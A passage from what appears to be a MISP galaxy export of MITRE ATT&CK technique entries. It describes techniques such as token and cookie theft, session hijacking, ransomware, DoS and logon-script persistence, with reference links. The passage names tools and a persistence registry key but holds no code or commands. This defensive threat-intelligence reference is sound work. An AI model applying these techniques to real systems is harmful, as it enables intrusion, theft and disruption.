Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework used to issue tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry through OAuth 2.0 using a variety of authorization protocols. An example of a commonly-used sequence is Microsoft’s Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested without requiring user credentials.

The tag is: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1635"

Table 5599. Table References

Links

https://attack.mitre.org/techniques/T1635

https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/

https://developer.android.com/training/app-links/index.html

https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols

https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow

https://tools.ietf.org/html/rfc8252

Remote Service Session Hijacking - T1563

Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.

Adversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://attack.mitre.org/techniques/T1563) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it hijacks an existing session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: RDP Hijacking Medium)(Citation: Breach Post-mortem SSH Hijack)

The tag is: misp-galaxy:mitre-attack-pattern="Remote Service Session Hijacking - T1563"

Table 5600. Table References

Links

https://attack.mitre.org/techniques/T1563

https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident

https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6

Steal Web Session Cookie - T1539

An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.

Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the target's machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypass some multi-factor authentication protocols.(Citation: Pass The Cookie)

There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx2 and Muraena that can gather session cookies through a malicious proxy (ex: [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)

After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.

The tag is: misp-galaxy:mitre-attack-pattern="Steal Web Session Cookie - T1539"

Table 5601. Table References

Links

https://attack.mitre.org/techniques/T1539

https://github.com/kgretzky/evilginx2

https://github.com/muraenateam/muraena

https://securelist.com/project-tajmahal/90240/

https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/

https://wunderwuzzi23.github.io/blog/passthecookie.html

Targeted social media phishing - T1366

This technique has been deprecated. Please use [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003).

Sending messages through social media platforms to individuals identified as a target. These messages may include malicious attachments or links to malicious sites or they may be designed to establish communications for future actions. (Citation: APT1) (Citation: Nemucod Facebook)

The tag is: misp-galaxy:mitre-attack-pattern="Targeted social media phishing - T1366"

Table 5602. Table References

Links

https://attack.mitre.org/techniques/T1366

Exfiltration Over Alternative Protocol - T1639

Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may opt to also encrypt and/or obfuscate these alternate channels.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1639"

Table 5603. Table References

Links

https://attack.mitre.org/techniques/T1639

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-30.html

Modify Trusted Execution Environment - T1399

If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device’s Trusted Execution Environment (TEE) or other similar isolated execution environment where the code can evade detection, may persist after device resets, and may not be removable by the device user. Running code within the TEE may provide an adversary with the ability to monitor or tamper with overall device behavior.(Citation: Roth-Rootkits)

The tag is: misp-galaxy:mitre-attack-pattern="Modify Trusted Execution Environment - T1399"

Table 5604. Table References

Links

https://attack.mitre.org/techniques/T1399

https://hackinparis.com/data/slides/2013/Slidesthomasroth.pdf

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html

https://www.apple.com/business/docs/iOS_Security_Guide.pdf

Masquerade as Legitimate Application - T1444

An adversary could distribute developed malware by masquerading the malware as a legitimate application. This can be done in two different ways: by embedding the malware in a legitimate application, or by pretending to be a legitimate application.

Embedding the malware in a legitimate application is done by downloading the application, disassembling it, adding the malicious code, and then re-assembling it.(Citation: Zhou) The app would appear to be the original app, but would contain additional malicious functionality. The adversary could then publish the malicious application to app stores or use another delivery method.

Pretending to be a legitimate application relies heavily on lack of scrutinization by the user. Typically, a malicious app pretending to be a legitimate one will have many similar details as the legitimate one, such as name, icon, and description.(Citation: Palo Alto HenBox)

Malicious applications may also masquerade as legitimate applications when requesting access to the accessibility service in order to appear as legitimate to the user, increasing the likelihood that the access will be granted.

The tag is: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444"

Table 5605. Table References

Links

http://ieeexplore.ieee.org/document/6234407

https://attack.mitre.org/techniques/T1444

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-14.html

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html

https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/

Out of Band Data - T1644

Adversaries may communicate with compromised devices using out of band data streams. This could be done for a variety of reasons, including evading network traffic monitoring, as a backup method of command and control, or for data exfiltration if the device is not connected to any Internet-providing networks (i.e. cellular or Wi-Fi). Several out of band data streams exist, such as SMS messages, NFC, and Bluetooth.

On Android, applications can read push notifications to capture content from SMS messages, or other out of band data streams. This requires that the user manually grant notification access to the application via the settings menu. However, the application could launch an Intent to take the user directly there.

On iOS, there is no way to programmatically read push notifications.

The tag is: misp-galaxy:mitre-attack-pattern="Out of Band Data - T1644"

Table 5606. Table References

Links

https://attack.mitre.org/techniques/T1644

Network Denial of Service - T1464

Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth that services rely on, or by jamming the signal going to or coming from devices.

A Network DoS will occur when an adversary is able to jam radio signals (e.g. Wi-Fi, cellular, GPS) around a device to prevent it from communicating. For example, to jam a cellular signal, an adversary may use a handheld signal jammer, which jams devices within the jammer’s operational range.(Citation: NIST-SP800187)

Usage of cellular jamming has been documented in several arrests reported in the news.(Citation: CNET-Celljammer)(Citation: NYTimes-Celljam)(Citation: Digitaltrends-Celljam)(Citation: Arstechnica-Celljam)

The tag is: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1464"

Table 5607. Table References

Links

http://csrc.nist.gov/publications/drafts/800-187/sp800_187_draft.pdf

https://arstechnica.com/tech-policy/2016/03/man-accused-of-jamming-passengers-cell-phones-on-chicago-subway/

https://attack.mitre.org/techniques/T1464

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-7.html

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-8.html

https://pages.nist.gov/mobile-threat-catalogue/gps-threats/GPS-0.html

https://pages.nist.gov/mobile-threat-catalogue/lan-pan-threats/LPN-5.html

https://www.cnet.com/news/man-put-cell-phone-jammer-in-car-to-stop-driver-calls-fcc-says/

https://www.digitaltrends.com/mobile/florida-teacher-punished-after-signal-jamming-his-students-cell-phones/

https://www.nytimes.com/2007/11/04/technology/04jammer.html

Compromise Client Software Binary - T1554

Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers.

Adversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)

Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Client Software Binary - T1554"

Table 5608. Table References

Links

https://attack.mitre.org/techniques/T1554

https://unit42.paloaltonetworks.com/banking-trojan-techniques/#post-125550-_rm3d6xxbk52n

https://web-assets.esetstatic.com/wls/2021/10/eset_fontonlake.pdf

Compromise Client Software Binary - T1645

Adversaries may modify system software binaries to establish persistent access to devices. System software binaries are used by the underlying operating system and users over adb or terminal emulators.

Adversaries may make modifications to client software binaries to carry out malicious tasks when those binaries are executed. For example, malware may come with a pre-compiled malicious binary intended to overwrite the genuine one on the device. Since these binaries may be routinely executed by the system or user, the adversary can leverage this for persistent access to the device.

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Client Software Binary - T1645"

Table 5609. Table References

Links

https://attack.mitre.org/techniques/T1645

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html

https://source.android.com/security/verifiedboot/

Abuse Elevation Control Mechanism - T1548

Adversaries may circumvent mechanisms designed to control elevated privileges in order to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit the privileged actions a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that are considered higher risk. An adversary can use several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.

The tag is: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548"

Table 5610. Table References

Links

https://attack.mitre.org/techniques/T1548

Replication Through Removable Media - T1458

Adversaries may move onto devices by exploiting or copying malware to devices connected via USB. In the case of Lateral Movement, adversaries may utilize the physical connection of a device to a compromised or malicious charging station or PC to bypass application store requirements and install malicious applications directly.(Citation: Lau-Mactans) In the case of Initial Access, adversaries may attempt to exploit the device via the connection to gain access to data stored on the device.(Citation: Krebs-JuiceJacking) Examples of this include:

  • Exploiting insecure bootloaders in a Nexus 6 or 6P device over USB and gaining the ability to perform actions including intercepting phone calls, intercepting network traffic, and obtaining the device’s physical location.(Citation: IBM-NexusUSB)

  • Exploiting weakly-enforced security boundaries in Android devices such as the Google Pixel 2 over USB.(Citation: GoogleProjectZero-OATmeal)

  • Products from Cellebrite and Grayshift that purportedly can exploit some iOS devices, using physical access to the data port, to unlock the passcode.(Citation: Computerworld-iPhoneCracking)

The tag is: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1458"

Table 5611. Table References

Links

http://krebsonsecurity.com/2011/08/beware-of-juice-jacking/

https://attack.mitre.org/techniques/T1458

https://googleprojectzero.blogspot.com/2018/09/oatmeal-on-universal-cereal-bus.html

https://media.blackhat.com/us-13/US-13-Lau-Mactans-Injecting-Malware-into-iOS-Devices-via-Malicious-Chargers-WP.pdf

https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-1.html

https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-2.html

https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-6.html

https://securityintelligence.com/android-vulnerabilities-attacking-nexus-6-and-6p-custom-boot-modes/

https://www.computerworld.com/article/3268729/apple-ios/two-vendors-now-sell-iphone-cracking-technology-and-police-are-buying.html

Downgrade to Insecure Protocols - T1466

An adversary could cause the mobile device to use less secure protocols, for example by jamming frequencies used by newer protocols such as LTE and only allowing older protocols such as GSM to communicate(Citation: NIST-SP800187). Use of less secure protocols may make communication easier to eavesdrop upon or manipulate.

The tag is: misp-galaxy:mitre-attack-pattern="Downgrade to Insecure Protocols - T1466"

Table 5612. Table References

Links

http://csrc.nist.gov/publications/drafts/800-187/sp800_187_draft.pdf

https://attack.mitre.org/techniques/T1466

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-3.html

Rogue Cellular Base Station - T1467

An adversary could set up a rogue cellular base station and then use it to eavesdrop on or manipulate cellular device communication. A compromised cellular femtocell could be used to carry out this technique(Citation: Computerworld-Femtocell).

The tag is: misp-galaxy:mitre-attack-pattern="Rogue Cellular Base Station - T1467"

Table 5613. Table References

Links

http://www.computerworld.com/article/2484538/cybercrime-hacking/researchers-exploit-cellular-tech-flaws-to-intercept-phone-calls.html

https://attack.mitre.org/techniques/T1467

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-7.html

Data Encrypted for Impact - T1486

Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018)

In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017)

To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").(Citation: NHS Digital Egregor Nov 2020)

In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)

The tag is: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486"

Table 5614. Table References

Links

https://attack.mitre.org/techniques/T1486

https://digital.nhs.uk/cyber-alerts/2020/cc-3681#summary

https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/

https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/

https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html

https://www.us-cert.gov/ncas/alerts/AA18-337A

https://www.us-cert.gov/ncas/alerts/TA16-091A

https://www.us-cert.gov/ncas/alerts/TA17-181A

Exploit via Radio Interfaces - T1477

The mobile device may be targeted for exploitation through its interface to cellular networks or other radio interfaces.

Baseband Vulnerability Exploitation

A message sent over a radio interface (typically cellular, but potentially Bluetooth, GPS, NFC, Wi-Fi(Citation: ProjectZero-BroadcomWiFi) or other) to the mobile device could exploit a vulnerability in code running on the device(Citation: Register-BaseStation)(Citation: Weinmann-Baseband).

Malicious SMS Message

An SMS message could contain content designed to exploit vulnerabilities in the SMS parser on the receiving device(Citation: Forbes-iPhoneSMS). An SMS message could also contain a link to a web site containing malicious content designed to exploit the device web browser. Vulnerable SIM cards may be remotely exploited and reprogrammed via SMS messages(Citation: SRLabs-SIMCard).

The tag is: misp-galaxy:mitre-attack-pattern="Exploit via Radio Interfaces - T1477"

Table 5615. Table References

Links

http://www.forbes.com/2009/07/28/hackers-iphone-apple-technology-security-hackers.html

http://www.theregister.co.uk/2015/11/12/mobile_pwn2own1/

https://attack.mitre.org/techniques/T1477

https://googleprojectzero.blogspot.com/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html

https://srlabs.de/bites/rooting-sim-cards/

https://www.usenix.org/system/files/conference/woot12/woot12-final24.pdf

Network Denial of Service - T1498

Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)

A Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).

Several aspects of Network DoS attacks apply across multiple methods, including IP address spoofing and botnets.

Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.

For DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).

The tag is: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498"

Table 5616. Table References

Links

https://attack.mitre.org/techniques/T1498

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf

https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html

https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf

https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf

Endpoint Denial of Service - T1499

Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)

An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).

Several aspects of DoS attacks against endpoint resources apply across multiple methods, including IP address spoofing and botnets.

Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.

Botnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target’s resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)

In cases where traffic manipulation is used, there may be points in the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China)

For attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498).

The tag is: misp-galaxy:mitre-attack-pattern="Endpoint Denial of Service - T1499"

Table 5617. Table References

Links

https://arstechnica.com/information-technology/2015/03/massive-denial-of-service-attack-on-github-tied-to-chinese-government/

https://attack.mitre.org/techniques/T1499

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf

https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html

https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf

https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged

https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf

Credentials from Password Stores - T1555

Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.

The tag is: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555"

Table 5618. Table References

Links

https://attack.mitre.org/techniques/T1555

Exfiltration Over Web Service - T1567

Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.

Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Web Service - T1567"

Table 5619. Table References

Links

https://attack.mitre.org/techniques/T1567

Exploitation for Client Execution - T1658

Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to insecure coding practices that can lead to unanticipated behavior. Adversaries may take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly use to do work, so those applications are a useful target for exploit research and development because of their high utility.

Adversaries may use device-based zero-click exploits for code execution. These exploits are powerful because there is no user interaction required for code execution.

SMS/iMessage Delivery

SMS and iMessage in iOS are common targets through [Drive-By Compromise](https://attack.mitre.org/techniques/T1456), [Phishing](https://attack.mitre.org/techniques/T1660), etc. Adversaries may embed malicious links, files, etc. in SMS messages or iMessages. Mobile devices may be compromised through one-click exploits, where the victim must interact with a text message, or zero-click exploits, where no user interaction is required.

AirDrop

Unique to iOS, AirDrop is a network protocol that allows iOS users to transfer files between iOS devices. Before patches from Apple were released, on iOS 13.4 and earlier, adversaries may force the Apple Wireless Direct Link (AWDL) interface to activate, then exploit a buffer overflow to gain access to the device and run as root without interaction from the user.

The tag is: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1658"

Table 5620. Table References

Links

https://attack.mitre.org/techniques/T1658

Search Open Technical Databases - T1596

Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)

Adversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="Search Open Technical Databases - T1596"

Table 5621. Table References

Links

https://attack.mitre.org/techniques/T1596

https://dnsdumpster.com/

https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2

https://shodan.io

https://www.circl.lu/services/passive-dns/

https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/

https://www.sslshopper.com/ssl-checker.html

https://www.whois.net/

Modify Cloud Compute Infrastructure - T1578

An adversary may attempt to modify a cloud account’s compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.

Permissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Modify Cloud Compute Infrastructure - T1578"

Table 5622. Table References

Links

https://attack.mitre.org/techniques/T1578

https://content.fireeye.com/m-trends/rpt-m-trends-2020

Gather Victim Identity Information - T1589

Adversaries may gather information about the victim’s identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks)

Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).

The tag is: misp-galaxy:mitre-attack-pattern="Gather Victim Identity Information - T1589"

Table 5623. Table References

Links

https://attack.mitre.org/techniques/T1589

https://github.com/dxa4481/truffleHog

https://github.com/michenriksen/gitrob

https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/

https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/

https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/

https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196

https://www.opm.gov/cybersecurity/cybersecurity-incidents/

https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/

https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/

SNMP (MIB Dump) - T1602.001

Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).

The MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight into their systems, such as system information, hardware descriptions, physical location, and software packages(Citation: SANS Information Security Reading Room Securing SNMP Securing SNMP). The MIB may also contain device operational information, including running configuration, routing table, and interface details.

Adversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks)

The tag is: misp-galaxy:mitre-attack-pattern="SNMP (MIB Dump) - T1602.001"

Table 5624. Table References

Links

https://attack.mitre.org/techniques/T1602/001

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3

https://www.sans.org/reading-room/whitepapers/networkdevs/securing-snmp-net-snmp-snmpv3-1051

https://www.us-cert.gov/ncas/alerts/TA18-106A

Logon Script (Windows) - T1037.001

Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done by adding the path of a script to the <code>HKCU\Environment\UserInitMprLogonScript</code> Registry key.(Citation: Hexacorn Logon Scripts)

Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

The tag is: misp-galaxy:mitre-attack-pattern="Logon Script (Windows) - T1037.001"

Table 5625. Table References

Links

http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/

https://attack.mitre.org/techniques/T1037/001

https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx

Push-notification client-side exploit - T1373

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

A technique to push an [iOS](https://www.apple.com/ios) or [Android](https://www.android.com) MMS-type message to the target which does not require interaction on the part of the target to be successful. (Citation: BlackHat Stagefright) (Citation: WikiStagefright)

The tag is: misp-galaxy:mitre-attack-pattern="Push-notification client-side exploit - T1373"

Table 5626. Table References

Links

